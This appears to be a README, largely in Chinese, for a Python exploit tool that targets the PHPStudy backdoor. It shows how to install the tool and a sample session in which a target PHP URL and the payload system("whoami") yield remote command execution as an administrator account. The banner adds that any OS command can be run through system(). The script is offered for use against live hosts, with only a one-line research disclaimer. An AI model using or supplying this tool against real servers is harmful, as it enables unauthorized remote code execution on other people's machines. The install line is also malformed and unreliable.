PHPStudy_BackDoor_Exp

PHPStudy后门事件 EXP 适用于Python3

适用于Python2.x的版本

Bug-Project-Framework

使用方法

python3 -m pip install requests,choice


λ python3 phpstudy_backdoor.py                                                                                              
                                                                                                                            
                                                                                                                            
 _____   _    _  _____    _____  _               _          ____                _        _                                  
 |  __ \ | |  | ||  __ \  / ____|| |             | |        |  _ \              | |      | |                                
 | |__) || |__| || |__) || (___  | |_  _   _   __| | _   _  | |_) |  __ _   ___ | | __ __| |  ___    ___   _ __             
 |  ___/ |  __  ||  ___/  \___ \ | __|| | | | / _` || | | | |  _ <  / _` | / __|| |/ // _` | / _ \  / _ \ | '__|            
 | |     | |  | || |      ____) || |_ | |_| || (_| || |_| | | |_) || (_| || (__ |   <| (_| || (_) || (_) || |               
 |_|     |_|  |_||_|     |_____/  \__| \__,_| \__,_| \__, | |____/  \__,_| \___||_|\_\\__,_| \___/  \___/ |_|               
                                                      __/ |                                                                 
                                                     |___/                                                                  
                                                                                                                            
                    Usage & e.g. :                                                                                          
                        Target Url:                                                                                         
                        localhost/flag.php                                                                                  
                        Input Your Command:                                                                                 
                        phpinfo();                                                                                          
                                                                                                                            
                    Notice: Command Must Be PHP Function, If You Want To Execute OS Command, Use: system('YOUR COMMAND');   
                    By:Sp4ce                                                                                                
                    Have Fun                                                                                                
                                                                                                                            
Target Url:                                                                                                                 
localhost/flag.php                                                                                                          
Input Your Command:                                                                                                         
system("whoami");                                                                                                           
[+] Command Execute Successful.                                                                                             
desktop-XXXX\administrator                                                                                               

注意

1. flag.php可以使任意可访问到的php文件，必须填写完整！
2. 脚本仅用于安全研究，请勿用于非法用途！